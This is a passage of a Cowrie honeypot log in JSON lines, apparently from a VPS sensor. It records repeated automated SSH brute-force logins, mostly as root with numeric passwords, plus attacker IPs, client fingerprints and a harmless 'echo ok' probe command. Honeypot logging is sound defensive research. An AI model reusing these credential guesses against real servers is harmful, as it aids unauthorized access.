"3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.448963Z","src_ip":"212.227.125.160","session":"3e761eeedc07"}
{"eventid":"cowrie.login.success","username":"root","password":"15","message":"login attempt [root/15] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.532955Z","src_ip":"212.227.125.160","session":"3e761eeedc07"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:31:12.641855Z","src_ip":"212.227.125.160","session":"3e761eeedc07"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.642565Z","src_ip":"212.227.125.160","session":"3e761eeedc07"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.666517Z","src_ip":"212.227.125.160","session":"3e761eeedc07"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.667711Z","src_ip":"212.227.125.160","session":"3e761eeedc07"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52212,"dst_ip":"1.2.3.4","dst_port":22,"session":"d861c36a8449","protocol":"ssh","message":"New connection: 212.227.125.160:52212 (1.2.3.4:22) [session: d861c36a8449]","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.688360Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.689177Z","src_ip":"212.227.125.160","session":"d861c36a8449"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.711298Z","src_ip":"212.227.125.160","session":"d861c36a8449"}
{"eventid":"cowrie.login.success","username":"root","password":"141278","message":"login attempt [root/141278] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.783961Z","src_ip":"212.227.125.160","session":"d861c36a8449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:31:12.848512Z","src_ip":"212.227.125.160","session":"d861c36a8449"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.849276Z","src_ip":"212.227.125.160","session":"d861c36a8449"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.872935Z","src_ip":"212.227.125.160","session":"d861c36a8449"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.874083Z","src_ip":"212.227.125.160","session":"d861c36a8449"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52220,"dst_ip":"1.2.3.4","dst_port":22,"session":"e51719f1c60f","protocol":"ssh","message":"New connection: 212.227.125.160:52220 (1.2.3.4:22) [session: e51719f1c60f]","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.894731Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.895525Z","src_ip":"212.227.125.160","session":"e51719f1c60f"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.917959Z","src_ip":"212.227.125.160","session":"e51719f1c60f"}
{"eventid":"cowrie.login.success","username":"root","password":"14101984","message":"login attempt [root/14101984] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.990985Z","src_ip":"212.227.125.160","session":"e51719f1c60f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:31:13.112916Z","src_ip":"212.227.125.160","session":"e51719f1c60f"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:31:13.113606Z","src_ip":"212.227.125.160","session":"e51719f1c60f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:31:13.137236Z","src_ip":"212.227.125.160","session":"e51719f1c60f"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:31:13.138334Z","src_ip":"212.227.125.160","session":"e51719f1c60f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52230,"dst_ip":"1.2.3.4","dst_port":22,"session":"612761a14d47","protocol":"ssh","message":"New connection: 212.227.125.160:52230 (1.2.3.4:22) [session: 612761a14d47]","sensor":"my-vps","timestamp":"2025-08-26T10:31:13.159724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:31:13.160595Z","src_ip":"212.227.125.160","session":"612761a14d47"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:31:13.183244Z","src_ip":"212.227.125.160","session":"612761a14d47"}
{"eventid":"cowrie.login.success","username":"root","password":"140885","message":"login attempt [root/140885] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:31:13.255559Z","src_ip":"212.227.125.160","session":"612761a14d47"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:31:13.368588Z","src_ip":"212.227.125.160","session":"612761a14d47"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:31:13.369270Z","src_ip":"212.227.125.160","session":"612761a14d47"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:31:13.395686Z","src_ip":"212.227.125.160","session":"612761a14d47"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:31:13.396676Z","src_ip":"212.227.125.160","session":"612761a14d47"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52246,"dst_ip":"1.2.3.4","dst_port":22,"session":"9072731d898c","protocol":"ssh","message":"New connection: 212.227.125.160:52246 (1.2.3.4:22) [session: 9072731d898c]","sensor":"my-vps","timestamp":"2025-08-26T10:31:13.417415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:31:13.418446Z","src_ip":"212.227.125.160","session":"9072731d898c"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:31:13.440948Z","src_ip":"212.227.125.160","session":"9072731d898c"}
{"eventid":"cowrie.login.success","username":"root","password":"140881","message":"login attempt [root/140881] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:31:13.513450Z","src_ip":"212.227.125.160","session":"9072731d898c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:31:13.577626Z","src_ip":"212.227.125.160","session":"9072731d898c"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:31:13.578795Z","src_ip":"212.227.125.160","session":"9072731d898c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:31:13.602881Z","src_ip":"212.227.125.160","session":"9072731d898c"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:31:13.604072Z","src_ip":"212.227.125.160","session":"9072731d898c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52248,"dst_ip":"1.2.3.4","dst_port":22,"session":"24e30d536dbf","protocol":"ssh","message":"New connection: 212.227.125.160:52248 (1.2.3.4:22) [session: 24e30d536dbf]","sensor":"my-vps","timestamp":"2025-08-26T10:31:24.858635Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:31:24.859629Z","src_ip":"212.227.125.160","session":"24e30d536dbf"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:31:24.881953Z","src_ip":"212.227.125.160","session":"24e30d536dbf"}
{"eventid":"cowrie.login.success","username":"root","password":"140785","message":"login attempt [root/140785] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:31:24.965209Z","src_ip":"212.227.125.160","session":"24e30d536dbf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:31:25.082748Z","src_ip":"212.227.125.160","session":"24e30d536dbf"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:31:25.083543Z","src_ip":"212.227.125.160","session":"24e30d536dbf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:31:25.107211Z","src_ip":"212.227.125.160","session":"24e30d536dbf"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:31:25.108260Z","src_ip":"212.227.125.160","session":"24e30d536dbf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36278,"dst_ip":"1.2.3.4","dst_port":23,"session":"728ea05da965","protocol":"telnet","message":"New connection: 212.227.125.160:36278 (1.2.3.4:23) [session: 728ea05da965]","sensor":"my-vps","timestamp":"2025-08-26T10:31:32.469998Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":38064,"dst_ip":"1.2.3.4","dst_port":22,"session":"e15feb608da5","protocol":"ssh","message":"New connection: 196.251.86.249:38064 (1.2.3.4:22) [session: e15feb608da5]","sensor":"my-vps","timestamp":"2025-08-26T10:31:34.484912Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:31:35.020570Z","src_ip":"196.251.86.249","session":"e15feb608da5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:31:35.021523Z","src_ip":"196.251.86.249","session":"e15feb608da5"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1q2w3e4r","message":"login attempt [oracle/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-08-26T10:31:36.857934Z","src_ip":"196.251.86.249","session":"e15feb608da5"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:31:38.515414Z","src_ip":"196.251.86.249","session":"e15feb608da5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40240,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d3278ee680f","protocol":"ssh","message":"New connection: 212.227.125.160:40240 (1.2.3.4:22) [session: 8d3278ee680f]","sensor":"my-vps","timestamp":"2025-08-26T10:31:43.227569Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:31:43.228653Z","src_ip":"212.227.125.160","session":"8d3278ee680f"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:31:43.250764Z","src_ip":"212.227.125.160","session":"8d3278ee680f"}
{"eventid":"cowrie.login.success","username":"root","password":"140384","message":"login attempt [root/140384] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:31:43.350909Z","src_ip":"212.227.125.160","session":"8d3278ee680f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:31:43.414585Z","src_ip":"212.227.125.160","session":"8d3278ee680f"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:31:43.415451Z","src_ip":"212.227.125.160","session":"8d3278ee680f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:31:43.439716Z","src_ip":"212.227.125.160","session":"8d3278ee680f"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:31:43.441020Z","src_ip":"212.227.125.160","session":"8d3278ee680f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40250,"dst_ip":"1.2.3.4","dst_port":22,"session":"79e600354fa0","protocol":"ssh","message":"New connection: 212.227.125.160:40250 (1.2.3.4:22) [session: 79e600354fa0]","sensor":"my-vps","timestamp":"2025-08-26T10:31:43.461879Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:31:43.462857Z","src_ip":"212.227.125.160","session":"79e600354fa0"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:31:43.485475Z","src_ip":"212.227.125.160","session":"79e600354fa0"}
{"eventid":"cowrie.login.success","username":"root","password":"140282","message":"login attempt [root/140282] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:31:43.557265Z","src_ip":"212.227.125.160","session":"79e600354fa0"}
